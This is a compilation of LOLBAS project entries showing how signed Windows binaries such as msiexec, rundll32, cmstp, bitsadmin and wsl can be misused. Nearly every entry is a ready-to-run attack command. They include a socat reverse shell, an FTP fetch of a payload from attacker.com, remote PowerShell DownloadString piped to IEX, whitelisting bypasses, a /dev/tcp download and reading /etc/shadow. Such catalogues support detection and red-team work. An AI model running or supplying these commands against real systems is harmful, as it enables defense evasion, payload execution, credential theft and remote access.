### Install MSI with Remote MST using Msiexec.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Msiexec This command installs a local MSI file while applying a transformation file (MST) from a remote URL. The MST file can contain malicious code or binaries, enabling advanced attack scenarios. The '/qb' flag provides a reduced UI for installation. ```bash msiexec /i C:\Windows\Temp\file.msi TRANSFORMS="https://www.example.org/file.mst" /qb ``` -------------------------------- ### Download and Install Software from Microsoft Store using winget.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Winget This command allows downloading and installing software from the Microsoft Store by its name or Store ID. It works even if the Microsoft Store App is blocked on the machine and requires a Microsoft account. This can be used for Ingress Tool Transfer. ```powershell winget.exe install --accept-package-agreements -s msstore {name or ID} ``` -------------------------------- ### Execute Binary with Arguments using Devtoolslauncher.exe (CMD) Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher This command executes a specified binary with given arguments. The 'LaunchForDeploy' argument indicates deployment, and the actual execution is handled by 'developertoolssvc.exe'. Requires user privileges and VS/VScode installed on Windows 7 and up. ```cmd devtoolslauncher.exe LaunchForDeploy C:\Windows\Temp\file.exe "/arg1 /arg2" test ``` -------------------------------- ### Execute Binary with Arguments using Devtoolslauncher.exe for Debug (CMD) Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher This command executes a specified binary with given arguments, specifically for debugging purposes. The actual execution is handled by 'developertoolssvc.exe'. Requires user privileges and VS/VScode installed on Windows 7 and up. ```cmd devtoolslauncher.exe LaunchForDebug C:\Windows\Temp\file.exe "/arg1 /arg2" test ``` -------------------------------- ### Start Assistive Technology with Atbroker.exe Source: https://lolbas-project.github.io/api/lolbas Atbroker.exe is a helper binary for Assistive Technology (AT). It can be used to start a registered AT service, which can be manipulated to execute arbitrary code by modifying system registry entries. ```cmd AtBroker.exe /start malware ``` -------------------------------- ### Install MSI Silently using Msiexec.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Msiexec This command silently installs a local MSI file. It's a straightforward method for deploying Windows Installer packages without user interaction. Ensure the MSI file exists at the specified path. ```bash msiexec /quiet /i file.msi ``` -------------------------------- ### Execute File with AppCert.exe Source: https://lolbas-project.github.io/api/lolbas AppCert.exe is the Windows App Certification Kit command-line tool. It can be used to execute arbitrary files, including executables and MSI packages. This can be leveraged for defense evasion or to install malicious MSI files. ```powershell appcert.exe test -apptype desktop -setuppath "C:\Path\To\Your\Executable.exe" -reportoutputpath "C:\Path\To\Output.xml" ``` ```powershell appcert.exe test -apptype desktop -setuppath "C:\Path\To\Your\Installer.msi" -setupcommandline /q -reportoutputpath "C:\Path\To\Output.xml" ``` -------------------------------- ### Install Remote MSI Silently using Msiexec.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Msiexec This command silently installs an MSI file downloaded from a remote URL. It allows for the execution of malicious MSI packages hosted on external servers. The '/q' flag ensures silent installation. ```bash msiexec /q /i https://www.example.org/file.ext ``` -------------------------------- ### Execute Pnputil.exe to Install Driver Source: https://lolbas-project.github.io/lolbas/Binaries/Pnputil This snippet demonstrates how to use Pnputil.exe to install a driver from an INF file. It requires administrator privileges and is applicable to Windows 7, 10, and 11. The primary use case is adding a driver, potentially a malicious one, to the system. ```cmd pnputil.exe -i -a C:\Windows\Temp\file.inf ``` -------------------------------- ### Establish Reverse Shell via Bash.exe (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Bash This example shows how `bash.exe` can be used to establish a reverse shell connection to a specified IP address and port. This technique is often employed for remote access and control, leveraging `socat` for the shell communication. ```bash bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" ``` -------------------------------- ### Execute Remote MSI with Devinit.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit This command downloads an MSI file from a specified URL to the local 'C:\Windows\Installer' directory and then installs it. This can be used to execute code from a remote MSI file. ```bash devinit.exe run -t msi-install -i https://www.example.org/file.msi ``` -------------------------------- ### Execute Command via ssh.exe ProxyCommand (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Ssh This example shows how to execute a specified command by leveraging the ProxyCommand option within ssh.exe. This technique can be used for defense evasion by performing the execution of a specified file. It is applicable on Windows 10. ```CMD ssh -o ProxyCommand="cmd /c c:\windows\system32\calc.exe" . ``` -------------------------------- ### Install Driver and Load DLL via Odbcconf Source: https://lolbas-project.github.io/lolbas/Binaries/Odbcconf This sequence of commands installs a new ODBC driver and configures a system DSN. It involves specifying the driver name, the path to the DLL, and the API level. This technique can be used to load and execute code from a DLL under the guise of driver installation, often requiring administrator privileges. ```powershell odbcconf INSTALLDRIVER "lolbas-project|Driver=C:\Windows\Temp\file.dll|APILevel=2" odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project" ``` -------------------------------- ### Download File from Internet using AppInstaller.exe Source: https://lolbas-project.github.io/lolbas/Binaries/AppInstaller AppInstaller.exe can be used to download files from a specified URL. The tool is spawned by the default handler for the ms-appinstaller URI scheme, which then attempts to load or install a package from the provided URL, saving it to the INetCache. This functionality requires user privileges and is applicable to Windows 10 and Windows 11. ```powershell start ms-appinstaller://?source=https://www.example.org/file.exe ``` -------------------------------- ### Execute Remote Command via WinRM (Win32_Service) Source: https://lolbas-project.github.io/lolbas/Scripts/Winrm Executes a command on a remote system by creating and starting a service using WinRM and the Win32_Service WMI class. This technique is used for lateral movement and requires administrative privileges on Windows 10 and 11. ```powershell winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd /c c:\windows\system32\calc.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 ``` -------------------------------- ### Execute Local INF File with CMSTP.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Cmstp This command silently installs a local INF file using cmstp.exe without creating a desktop icon. The INF file can contain instructions to execute a scriptlet (.SCT) file via scrobj.dll, enabling arbitrary code execution. This method is useful for executing local scripts or payloads hidden within INF files. ```bash cmstp.exe /ni /s C:\Windows\Temp\file.inf ``` -------------------------------- ### Execute Command via Registry with Provlaunch.exe (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Provlaunch This snippet demonstrates how to use Provlaunch.exe to execute a command defined in the Windows Registry. It requires administrator privileges and involves creating specific registry keys that contain the command to be executed. The registry keys are automatically deleted after successful execution. ```CMD reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0 reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe provlaunch.exe LOLBin ``` -------------------------------- ### Execute .NET DLL/EXE using InstallUtil.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Installutil This command executes a target .NET DLL or EXE using InstallUtil.exe. It's often used to bypass application whitelisting. The command requires the path to the InstallUtil.exe binary and the target DLL/EXE file. It logs to a file and suppresses console output. ```bash InstallUtil.exe /logfile= /LogToConsole=false /U file.dll ``` -------------------------------- ### Execute Runonce.exe with AlternateShellStartup (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Runonce This command executes a Run Once task configured in the Windows registry using runonce.exe with the /AlternateShellStartup parameter. This is often used for persistence and bypassing defensive measures. It requires administrator privileges. ```cmd Runonce.exe /AlternateShellStartup ``` -------------------------------- ### Execute INF file with Setupapi.dll (AWL Bypass) Source: https://lolbas-project.github.io/lolbas/Libraries/Setupapi This snippet demonstrates how to use rundll32.exe to execute a specified INF file with Setupapi.dll. This technique can be used for AWL bypass by executing local or remote scripts (e.g., .wsh/.sct) embedded within the INF file. It requires user privileges and is applicable to Windows 10 and Windows 11. ```cmd rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Windows\Temp\file.inf ``` -------------------------------- ### Start Screen Recording with PSR (Command Line) Source: https://lolbas-project.github.io/lolbas/Binaries/Psr This command starts the Windows Problem Steps Recorder to record the user's screen and clicks without displaying a graphical interface. The recording is saved to a specified zip file. Use 'psr.exe /stop' to terminate the recording and generate the output file. ```bash psr.exe /start /output C:\Windows\Temp\file.zip /sc 1 /gui 0 ``` -------------------------------- ### Launch Executable with AppLauncher.exe Source: https://lolbas-project.github.io/api/lolbas AppLauncher.exe is a User Experience Virtualization tool used to launch applications under monitoring. It can be abused to execute arbitrary executables, potentially bypassing security controls by leveraging a trusted Microsoft binary. ```powershell AppLauncher.exe "C:\Path\To\Your\Executable.exe" ``` -------------------------------- ### Execute Binary with VSDiagnostics.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics Starts a collection session and launches a specified executable using VSDiagnostics.exe. This can be used to proxy the execution of binaries. It utilizes kernelbase.CreateProcessW for launching. ```command-line VSDiagnostics.exe start 1 /launch:file.exe ``` ```command-line VSDiagnostics.exe start 2 /launch:file.exe /launchArgs:"/arg1 /arg2" ``` -------------------------------- ### Execute Binary with Pcwrun.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Pcwrun This snippet demonstrates how to use Pcwrun.exe to execute a target .EXE file. It leverages the Program Compatibility Wizard to achieve proxy execution of binaries. This method is useful for executing binaries in environments where direct execution might be restricted. ```powershell Pcwrun.exe C:\Windows\Temp\file.exe ``` -------------------------------- ### Download File with Shimgvw.dll Source: https://lolbas-project.github.io/api/lolbas Utilizes rundll32.exe to execute the ImageView_Fullscreen entry point from Shimgvw.dll. This allows for downloading a file from a remote URL to the local INetCache. It can be used with ImageView_FullscreenA as well. ```cmd rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe} ``` -------------------------------- ### AWL Bypass and Rollback Execution using Squirrel.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel Squirrel.exe can be used for AWL bypass by initiating a rollback update from a specified URL. This functionality can also lead to arbitrary code execution by downloading and installing a malicious NuGet package. ```bash squirrel.exe --updateRollback=https://www.example.org/file.ext ``` -------------------------------- ### Download Payload using InstallUtil.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Installutil This command utilizes InstallUtil.exe to download a remote payload and save it to the INetCache directory. It's a method for transferring files from a remote server. The command requires the path to InstallUtil.exe and the URL of the file to download. ```bash InstallUtil.exe https://www.example.org/file.ext ``` -------------------------------- ### Execute PowerShell with SyncAppvPublishingServer.exe Source: https://lolbas-project.github.io/api/lolbas SyncAppvPublishingServer.exe can be used to host PowerShell code execution, allowing for evasion of defensive measures. It downloads and executes a PowerShell script from a remote URL. ```powershell SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX" ``` -------------------------------- ### AWL Bypass and Execute Binary using Squirrel.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel Squirrel.exe can bypass Application Whitelisting (AWL) by downloading and executing NuGet packages from a remote URL. This can lead to arbitrary code execution. The `--update` flag initiates the download and installation process. ```bash squirrel.exe --update https://www.example.org/file.ext ``` -------------------------------- ### Execute pre-planted binary with Fsutil.exe trace decode Source: https://lolbas-project.github.io/lolbas/Binaries/Fsutil This command executes a pre-planted binary named netsh.exe from the current directory using fsutil.exe's trace decode functionality. It requires user privileges and is specific to Windows 11, aligning with ATT&CK technique T1218. ```bash fsutil.exe trace decode ``` -------------------------------- ### AWL Bypass with Syssetup.dll and INF Source: https://lolbas-project.github.io/lolbas/Libraries/Syssetup This snippet demonstrates how to bypass Application Whitelisting (AWL) using syssetup.dll and an INF file. It executes a specified local or remote .wsh/.sct script by calling the SetupInfObjectInstallAction function with specific parameters. This method may result in an error window popping up. ```cmd rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 C:\Windows\Temp\file.inf ``` -------------------------------- ### Execute sftp.exe with ProxyCommand (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Sftp This command demonstrates how sftp.exe can be used to execute arbitrary commands indirectly via the ProxyCommand option. It spawns ssh.exe, which then executes the specified command. This can be used for defensive evasion. ```cmd sftp -o ProxyCommand="cmd /c c:\windows\system32\calc.exe" . ``` -------------------------------- ### Execute EXE using Pcalua.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Pcalua This command executes a target .EXE file using the Program Compatibility Assistant. It's a method for proxying binary execution, requiring only user privileges and compatible with most Windows versions. ```bash pcalua.exe -a file.exe ``` -------------------------------- ### AWL Bypass with Update.exe (Remote Execution) Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update This command utilizes Update.exe to download and install a NuGet package from a remote URL, effectively bypassing Application Whitelisting. It requires user privileges and is compatible with Windows 7 and later. This method is categorized under T1218 ATT&CK® technique. ```bash Update.exe --update=https://www.example.org/file.ext ``` -------------------------------- ### Download Package with Update.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update This command uses Update.exe to download a NuGet package from a specified URL. It requires user privileges and is applicable on Windows 7 and later with Microsoft Teams installed. This technique falls under the T1218 ATT&CK® technique for System Binary Proxy Execution. ```bash Update.exe --download https://www.example.org/file.ext ``` -------------------------------- ### Execute ADS File via New Service Creation with sc.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Sc This command demonstrates how to create a new Windows service that executes a file hidden within an Alternate Data Stream (ADS). The `binPath` parameter is configured to point to the ADS file, which is then executed by `cmd.exe`. This is useful for executing arbitrary code disguised within file attributes. ```powershell sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\\ADS\\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice ``` -------------------------------- ### AWL Bypass with Update.exe (Remote SAMBA Execution) Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update This command leverages Update.exe to download and install a NuGet package from a remote SAMBA share, facilitating AWL bypass. It requires user privileges and is supported on Windows 7 and later. This technique aligns with the T1218 ATT&CK® technique. ```bash Update.exe --update=\\servername\C$\Windows\Temp\folder ``` -------------------------------- ### Start Network Packet Capture with Pktmon.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Pktmon Initiates a network packet capture using Pktmon.exe, storing the log file as PktMon.etl. This command requires administrator privileges and is compatible with Windows 10 (1809 and later) and Windows 11. It is useful for capturing sensitive traffic for network reconnaissance. ```powershell pktmon.exe start --etw ``` -------------------------------- ### Launch Executable via FileProtocolHandler with Url.dll Source: https://lolbas-project.github.io/api/lolbas Executes an arbitrary executable by calling the FileProtocolHandler entry point in url.dll using rundll32.exe. This is a straightforward 'Execute' technique. ```cmd rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe} ``` -------------------------------- ### Execute Command Line with RegisterOCX Source: https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack Launch a command line execution by calling the 'RegisterOCX' function within ieadvpack.dll. This can be used to run arbitrary commands, such as opening calculator. ```cmd rundll32 ieadvpack.dll, RegisterOCX cmd /c c:\windows\system32\calc.exe ``` -------------------------------- ### Execute with VsInstallationPath Flag - PowerShell Source: https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell Executes binaries and commands from the context of the signed script using the 'VsInstallationPath' flag. This technique is employed for proxy execution and is compatible with Windows 10 and 11, requiring user privileges. ```powershell powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; file.exe ;" ``` -------------------------------- ### Download File with Ftp.exe (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Ftp This snippet shows how to use Ftp.exe to download a file from an FTP server. It constructs an FTP command file in memory and then uses the 'ftp -s' command to execute the download. ```cmd cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" ``` -------------------------------- ### Execute Managed DLL with PowerShell Source: https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly This command executes a managed DLL using the CL_LoadAssembly.ps1 PowerShell script. It bypasses execution policies, sets the location to the script's directory, imports the script, loads a specified DLL (fun.dll in this example), and then executes a method ([Program]::Fun()) within that DLL. Dependencies include the PowerShell execution policy being bypassable and the presence of the CL_LoadAssembly.ps1 script and the target DLL. ```powershell powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()" ``` -------------------------------- ### Execute Remote INF File with CMSTP.exe (AWL Bypass) Source: https://lolbas-project.github.io/lolbas/Binaries/Cmstp This command silently installs a remote INF file using cmstp.exe without creating a desktop icon, effectively bypassing Application Whitelisting (AWL). The remote INF file can contain instructions to execute a scriptlet (.SCT) file via scrobj.dll, allowing for code execution directly from the internet. This technique is commonly used to download and execute malicious payloads. ```bash cmstp.exe /ni /s https://www.example.org/file.inf ``` -------------------------------- ### Download and Execute Remote EXE with ieexec.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Ieexec This snippet demonstrates how to use ieexec.exe to download and execute an executable file from a remote URL. It requires user privileges and is compatible with multiple Windows versions. This technique is often used for Ingress Tool Transfer. ```bash ieexec.exe https://www.example.org/file.exe ``` -------------------------------- ### Execute Commands with Ftp.exe (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Ftp This snippet demonstrates how to use Ftp.exe to execute commands by writing commands to a text file and then using the '-s' flag to have Ftp.exe process them. This is useful for spawning new processes indirectly. ```cmd echo !cmd /c c:\windows\system32\calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt ``` -------------------------------- ### Execute Arbitrary Binaries with DefaultPack.EXE (CMD) Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack This snippet demonstrates how to use DefaultPack.EXE to execute arbitrary commands via cmd.exe. It requires the DefaultPack.EXE binary to be present on the system. The input is a string containing the command to be executed. ```cmd DefaultPack.EXE /C:"cmd /c c:\windows\system32\calc.exe" ``` -------------------------------- ### Execute WSL.exe via Bash.exe Registry Hijacking (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Bash This demonstrates a technique where `bash.exe` can be tricked into executing a different `wsl.exe` binary by manipulating the `InstallLocation` registry value. If a malicious `wsl.exe` exists in a path specified by this registry key, it will be executed instead of the legitimate one, potentially leading to system binary proxy execution. ```bash bash.exe ``` -------------------------------- ### Launch Executable via .url file with Url.dll Source: https://lolbas-project.github.io/api/lolbas Launches an executable payload by proxying through a .url (information) file using the OpenURL entry point in url.dll via rundll32.exe. This technique falls under the 'Execute' category. ```cmd rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url} ``` -------------------------------- ### Execute Program with Ttdinject.exe (Windows 10 1909-) Source: https://lolbas-project.github.io/lolbas/Binaries/Ttdinject This command executes a program using Ttdinject.exe, requiring administrator privileges. It utilizes the '/ClientScenario TTDRecorder' and '/ddload 0' options along with client parameters to launch an executable. A log file is created in 'tmp.run'. This is applicable for spawning processes on older Windows versions. ```bash ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "file.exe" ``` -------------------------------- ### Execute Executable with Pixtool.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Pixtool Launches an executable using the PIX command-line utility. This is useful for executing programs under a trusted, Microsoft-signed binary for analysis. Requires user privileges and runs on Windows. ```command-line pixtool.exe launch C:\Windows\Temp\file.exe ``` -------------------------------- ### Execute Msconfig.exe with Command Argument (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/Msconfig This snippet demonstrates how to execute Msconfig.exe with a command argument, which can be leveraged for code execution by embedding commands within a crafted XML file. It requires administrator privileges and is applicable to multiple Windows versions. ```cmd Msconfig.exe -5 ``` -------------------------------- ### Execute Executable with WinFile Source: https://lolbas-project.github.io/api/lolbas Executes a specified executable file using winfile.exe as the parent process. This can be used for defense evasion by leveraging a legitimate Microsoft binary for execution. It takes the path to the executable as an argument. ```bash winfile.exe {PATH:.exe} ``` -------------------------------- ### Execute Executable with Delay using XBootMgrSleep.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgrSleep This snippet demonstrates how to execute a specified executable file (e.g., file.exe) using XBootMgrSleep.exe with a predefined delay in milliseconds. The delay can be replaced with any string for immediate execution. ```bash xbootmgrsleep.exe 1000 file.exe ``` -------------------------------- ### Download file using Wsl.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl This command utilizes WSL to download a file from a specified IP address and port. It uses bash's network redirection capabilities to pipe data from a TCP connection into a file named 'binary'. ```bash wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' ``` -------------------------------- ### Execute Command with Wmic.exe Source: https://lolbas-project.github.io/api/lolbas Wmic.exe can be used to execute commands, such as launching calc.exe. This is a common method for evading defensive measures by using a built-in Windows utility. It requires user privileges and is compatible with various Windows versions. ```cmd wmic.exe process call create "{CMD}" ``` -------------------------------- ### Execute Command via msedgewebview2.exe Renderer Prefix (CMD) Source: https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2 This command employs msedgewebview2.exe to launch the Microsoft Edge WebView2 browser control without sandboxing. It then spawns a specified command as its subprocess using the --renderer-cmd-prefix argument, facilitating proxy execution of commands. This method is effective on Windows 10 and Windows 11 and requires user privileges. ```powershell msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="cmd /c c:\windows\system32\calc.exe" ``` -------------------------------- ### Download File with DesktopImgDownldr.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr This command downloads a file from a specified URL and sets it as the computer's lockscreen image. It requires the SYSTEMROOT environment variable to be set, typically to a temporary location. The command takes the URL of the image and an event name as parameters. ```batch set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://www.example.org/file.ext /eventName:desktopimgdownldr ``` -------------------------------- ### Execute Batch File using Msdeploy.exe (CMD) Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy This snippet demonstrates how to execute a batch file locally using msdeploy.exe. It requires user privileges and is compatible with various Windows operating systems. The command leverages the 'RunCommand' source to execute the specified batch file. ```cmd msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="C:\Windows\Temp\file.bat" ``` -------------------------------- ### Execute EXE with explorer.exe direct argument Source: https://lolbas-project.github.io/lolbas/Binaries/Explorer Executes a specified .exe file with the parent process spawning from a new instance of explorer.exe without the /root argument. Similar to the previous method, this aids in defense evasion by breaking the process tree. It requires user privileges and is compatible with Windows 10 and Windows 11. ```powershell explorer.exe C:\Windows\Temp\file.exe ``` -------------------------------- ### Execute Binary via msedgewebview2.exe (EXE) Source: https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2 This command utilizes msedgewebview2.exe to launch the Microsoft Edge WebView2 browser control without sandboxing. It then spawns a specified executable as its subprocess, effectively proxying the execution of that binary. This technique is useful for executing arbitrary executables in a potentially less scrutinized manner. It requires low privileges and is applicable to Windows 10 and Windows 11. ```powershell msedgewebview2.exe --no-sandbox --browser-subprocess-path="C:\Windows\Temp\file.exe" ``` -------------------------------- ### Execute Local Executable via desk.cpl InstallScreenSaver (Windows) Source: https://lolbas-project.github.io/lolbas/Libraries/Desk This command executes a local executable payload with a .scr extension by calling the 'InstallScreenSaver' function within desk.cpl. This technique can be used to launch arbitrary executables disguised as screen savers. It requires user privileges and is applicable to Windows 10 and Windows 11. ```powershell rundll32.exe desk.cpl,InstallScreenSaver C:\Windows\Temp\file.scr ``` -------------------------------- ### Execute EXE with explorer.exe /root argument Source: https://lolbas-project.github.io/lolbas/Binaries/Explorer Executes a specified .exe file with the parent process spawning from a new instance of explorer.exe using the /root argument. This method is useful for defense evasion by breaking the process tree. It requires user privileges and is compatible with multiple Windows versions. ```powershell explorer.exe /root,"C:\Windows\Temp\file.exe" ``` -------------------------------- ### Execute Command from Alternate Data Stream using Bitsadmin Source: https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin This snippet demonstrates how to use bitsadmin.exe to execute a command from an alternate data stream. It involves creating a job, adding a file, configuring it to run a target command from an ADS, and then resuming and completing the job. This technique can be used for defensive evasion or persistence. ```bash bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 ``` -------------------------------- ### Launch Obfuscated Executable via FileProtocolHandler with Url.dll Source: https://lolbas-project.github.io/api/lolbas Launches an executable by calling FileProtocolHandler in url.dll, using an obfuscated path with the file protocol handler. This 'Execute' technique can be used to bypass detection. ```cmd rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e ``` -------------------------------- ### Execute PowerShell Script with SyncAppvPublishingServer.vbs Source: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver This snippet demonstrates how to execute a PowerShell script by injecting its code as an argument to the SyncAppvPublishingServer.vbs utility. The script downloads and executes a remote PowerShell file. This method leverages the PowerShell host invoked from a VBS script. ```powershell SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('https://www.example.org/file.ps1') | IEX" ``` -------------------------------- ### Execute Binary File using Bitsadmin Source: https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin This one-liner uses bitsadmin.exe to execute a specified binary file. It creates a job, adds the binary, sets a notification command line to execute it, and then resumes and resets the job. This can be employed for defensive evasion. ```bash bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset ``` -------------------------------- ### Execute File via Local Manifest with winget.exe Source: https://lolbas-project.github.io/lolbas/Binaries/Winget This command downloads a file specified in a .yml manifest and executes it. It requires the 'LocalManifestFiles' setting to be enabled in winget. This can be used to download and execute arbitrary files from the internet. ```powershell winget settings --enable LocalManifestFiles winget.exe install --manifest file.yml ``` -------------------------------- ### Launch Obfuscated Executable with Url.dll Source: https://lolbas-project.github.io/api/lolbas Launches an executable by calling OpenURL in url.dll, utilizing the file protocol handler with an obfuscated path. This is an 'Execute' technique that can bypass certain detection mechanisms. ```cmd rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e ``` -------------------------------- ### Read /etc/shadow as root via Wsl.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl This command uses WSL to execute the 'cat /etc/shadow' command as the root user. This can be used to read sensitive user information from the Linux environment, even without explicit root privileges on the Windows host. ```bash wsl.exe -u root -e cat /etc/shadow ``` -------------------------------- ### Download and Host Port with devtunnel.exe Source: https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels This command downloads and executes devtunnel.exe to enable a forwarded port, exposing a locally hosted service (e.g., on port 8080) to the internet. It requires the devtunnel.exe binary to be present in the system's PATH or current directory. ```bash devtunnel.exe host -p 8080 ``` -------------------------------- ### AWL Bypass with INF (DefaultInstall Implied) Source: https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack Execute a specified local or remote .wsh/.sct script using scrobj.dll within an INF file. This method calls the 'LaunchINFSection' directive with the 'DefaultInstall' section implied. ```cmd rundll32.exe ieadvpack.dll,LaunchINFSection C:\Windows\Temp\file.inf,,1, ```